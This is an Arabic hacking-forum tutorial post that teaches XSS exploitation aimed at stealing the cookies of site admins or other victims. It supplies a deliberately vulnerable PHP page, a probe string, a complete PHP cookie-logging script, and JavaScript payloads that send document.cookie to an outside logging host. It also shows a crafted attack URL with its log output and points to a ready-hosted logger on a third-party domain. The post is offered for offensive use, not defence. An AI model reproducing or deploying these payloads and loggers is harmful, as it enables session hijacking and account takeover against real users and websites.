التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > حقن xss - ssi

 
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 08-21-2011, 03:26 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية bleu moon
 

 

 
إحصائية العضو








bleu moon غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 12
bleu moon is on a distinguished road

افتراضي [ تم التجديد ] ~ شرح كامل متكامل لتغرات xss ~ | احترافي ..~


بسم الله الرحمآن الرحيم


ان شاء الله اليوم رح نشرح

\ اكتشاف تغرات xss
\ تعليق الآندكس من تغرات xss
\ سرقة كوكيز من تغرات xss



################

سرقة الكوكيز من تغرات xss

اولا لازم نقوم بتنصيب السيرفر الشخصي ع جهازنا

download

تانيا لازم يكون عندنا الموقع المصاب او السكربت
انا برمجة ملف عادي جدآآ ! مصاب بهذه التغره

نسميه مثلا ..~

xss.php



ومحتواه علشان تجربوآا معي الاستغلال الكامل لها ..~

كود PHP:

<?
echo $_GET***91;'test'***93; ;

echo 
'<b>@nor15din</b>'
?>


طيب الآن نستعرض الملف المصاب مع المتغير !

~~~~~~~~~~~~
على فكره شباب !
تم شرح التغره من قبل في المنتدى ..~
يستحسن انكم تراجعوا هذا الرابط ..~

http://www.vbspiders.com/vb/t24758.html

&

http://www.vbspiders.com/vb/t22376.html
~~~~~~~~~~~~

طيب نتابع




طبعا كيف نكتشف التغره سهل كثير ..~
يعني تضيف الكود هذا

كود PHP:

'"--></style></script>***************("Www.VbspiderS.Com")</script> 
بعد المتغير ..~
رح ارفق لكم الكود في المرفقات مع كل حاجه !

طيب رح نضغط اوونتر ورح تشوف ان رساله ضهرت لنا في المتصفح ..~




تعال الآن نستفيد من التغره !
اولا التغره تقدر تسرق بها كوكيز الآدمن او الضحيه بصفه عامه ..~
تقدر تحقن اكواد html او تغره للمتصفح ملغومه بباتش علشان تخترق ..~
شو هاي الحلاوه ..~
ههه
انا رح اشرح لكم كيف تسرق الكوكيز ..~
اولا لازمنا ملف لوج علشان يسجل لنا الكوكيز والمعلومات في ملف txt

ملفات اللوج تكون خاصه :(
وهناك ملفات لووج تجيب لك معلومات كامله !
كوكيز + الوقت + التاريخ + ...
وفي نوع آخر عادي ..~
يعطيك الكوكيز فقط !
ههع
رح اعطيكم ملف لووج عندي كثير حلو

طيب نشوف السورس كود بتاعوا ..~

كود PHP:

<?php 


function GetIP() 

    if (
getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown")) 
        
$ip getenv("HTTP_CLIENT_IP"); 
    else if (
getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown")) 
        
$ip getenv("HTTP_X_FORWARDED_FOR"); 
    else if (
getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown")) 
        
$ip getenv("REMOTE_ADDR"); 
    else if (isset(
$_SERVER***91;'REMOTE_ADDR'***93;) && $_SERVER***91;'REMOTE_ADDR'***93; && strcasecmp($_SERVER***91;'REMOTE_ADDR'***93;, "unknown")) 
        
$ip $_SERVER***91;'REMOTE_ADDR'***93;; 
    else 
        
$ip "unknown"
    return(
$ip); 


function 
logData() 

    
$ipLog="nor15din.txt"
    $****** = 
$_SERVER***91;'QUERY_STRING'***93;; 
    
$register_globals = (bool) ini_get('register_gobals'); 
    if (
$register_globals$ip getenv('REMOTE_ADDR'); 
    else 
$ip GetIP(); 

    
$rem_port $_SERVER***91;'REMOTE_PORT'***93;; 
    
$user_agent $_SERVER***91;'HTTP_USER_AGENT'***93;; 
    
$rqst_method $_SERVER***91;'METHOD'***93;; 
    
$rem_host $_SERVER***91;'REMOTE_HOST'***93;; 
    
$referer $_SERVER***91;'HTTP_REFERER'***93;; 
    
$date=date ("l dS of F Y h:i:s A"); 
    
$log=fopen("$ipLog""a+"); 

    if (
preg_match("/\bhtm\b/i"$ipLog) || preg_match("/\bhtml\b/i"$ipLog)) 
        
fputs($log"IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | ******:  $****** <br>"); 
    else 
        
fputs($log"IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE: $date | ******:  $****** \n\n"); 
    
fclose($log); 


logData();

echo 
'<b>powered by vbspiders team</b>'
?>
لازم نرفعوا على شل :(
انا عندي مرفوع على شل ..~


الموقع يلي رفعنا لو الووج رح يكون زي هيك مثلا !

www.vbspiders.com/log.php

ورح يسجل لنا المعلوومات في ملف اسموا nor15din.txt

www.vbspiders.com/nor15din.txt



طيب الآن كيف نستغل التغره ..~


يلزمنى كود تلغيم ..~

كود PHP:

"><a href="#" onclick="********.location='http://vbspiders.com/log.php?******=' +escape(********.******);"><Click Me></a></script> 
or

كود PHP:

"><script language= "JavaScript">********.location="http://vbspiders.com/log.php?******=" + ********.******;********.location="http://www.google.com"</script> 
حلو !
رح نضيف هذول الاكواد مع تغير مايجب تغيره




اقتباس
http://localhost/xss.php?test="><a href="#" onclick="********.location='http://vbspiders.com/log.php?******=' +escape(********.******);"><Click Me></a></script>

نضط اوونتر ونروح نفتح الملف nor15din.txt

اقتباس
IP: | PORT: 56840 | HOST: | Agent: | METHOD: | REF: | DATE: | ******: ******=

ههههه حلو ..~
ياريت اي واحد ينقل الموضوع ..~
يحافض على الحقوق :(




لتحميل الادواة

~~~~~~~~~~~~~~~~~~

الشي يلي اضفناه وجديد هو اننا شرحنا كل شي تقريبا يتعلق بهذه التغره في فيديوا + صفحه HTML



لتحميل الشرح الكامل على شكل صفحه HTML

لتحميل فيديوا التطبيق

وفي الاخير هذيه بسيطه وهي ملف لوج مرفوووع وجاهز

http://www.illicitromance.com/log.php

وفي هذه الصفحه رح يتم تسجيل الكوكيز + المعلومات

http://www.illicitromance.com/nor15din.txt


ع فكره هذه طريقة اخرى لتعليق آندكس مميز من تغرات

xss

priv8 ~ تعليق الاندكس من ثغرات priv8 ~ xss

~~~~~~~~~~~~

وهنا طريقة اخرى لاستغلال التغره مشروحة من طرف حبيبنا

IronMan



جديد استخدامات xss وهي الـ phishing login




بالتوفيق ..
@nor15din





F jl hgj[]d] D Z avp ;hlg lj;hlg gjyvhj xss | hpjvhtd >>Z la;gi l,q,u l,ru g;k hg]dk hgw,v hpjvht hsjtshv []d] vtu avp


التعديل الأخير تم بواسطة bleu moon ; 09-10-2011 الساعة 07:01 PM.

   

رد مع اقتباس
 

مواقع النشر (المفضلة)

الكلمات الدليلية (Tags)
مشكله, موضوع, موقع, لكن, الدين, الصور, احتراف, استفسار, جديد, رفع, شرح, xss


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 10:30 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0